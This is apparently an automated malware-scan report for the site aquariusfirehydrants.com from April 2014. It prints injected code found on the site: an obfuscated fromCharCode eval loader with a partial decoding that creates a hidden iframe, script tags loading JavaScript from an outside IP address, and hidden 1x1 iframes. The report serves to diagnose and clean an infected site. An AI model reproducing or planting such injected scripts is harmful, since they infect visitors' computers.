Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aquariusfirehydrants.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://aquariusfirehydrants.com/ | 200 OK Content-Length: 25262 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43, Decoded script: try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,36 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://aquariusfirehydrants.com/Aquarius_home.html | 200 OK Content-Length: 4929 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://69.90.47.251/Xmb4C6Jh.php?id=6317"></script> | ||
http://aquariusfirehydrants.com/Aquarius_contact.html | 200 OK Content-Length: 5145 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://69.90.47.251/Xmb4C6Jh.php?id=6316"></script> | ||
http://aquariusfirehydrants.com/Aquarius_services.html | 200 OK Content-Length: 5568 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://69.90.47.251/Xmb4C6Jh.php?id=6319"></script> | ||
http://aquariusfirehydrants.com/Aquarius_inspection.html | 200 OK Content-Length: 5476 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://69.90.47.251/Xmb4C6Jh.php?id=6318"></script> | ||
http://aquariusfirehydrants.com/test404page.js | 404 Not Found Content-Length: 6547 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d" style="width: 1px; height: 1px"> Hidden iFrame found. size: 1x1 src: http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67 <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67" style="width: 1px; height: 1px"> Hidden iFrame found. size: 1x1 src: http://www.dataquantum.com/en/ <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.dataquantum.com/en/" style="width: 1px; height: 1px"> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21987 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aquariusfirehydrants.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Apr 2014 22:39:12 GMT
Accept-Ranges: bytes
ETag: "1a58043-62ae-3d9f5c00"
Server: Apache/2.2.3 (CentOS)
Content-Length: 25262
Content-Type: text/html
Last-Modified: Sat, 12 Apr 2014 15:38:24 GMT
X-Powered-By: PleskLin
...25262 bytes of data.
GET / HTTP/1.1
Host: aquariusfirehydrants.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Apr 2014 22:39:12 GMT
Accept-Ranges: bytes
ETag: "1a58043-62ae-3d9f5c00"
Server: Apache/2.2.3 (CentOS)
Content-Length: 25262
Content-Type: text/html
Last-Modified: Sat, 12 Apr 2014 15:38:24 GMT
X-Powered-By: PleskLin
...25262 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aquariusfirehydrants.com
Referer: http://www.google.com/search?q=aquariusfirehydrants.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aquariusfirehydrants.com
Referer: http://www.google.com/search?q=aquariusfirehydrants.com
Result:
The result is similar to the first query. There are no suspicious redirects found.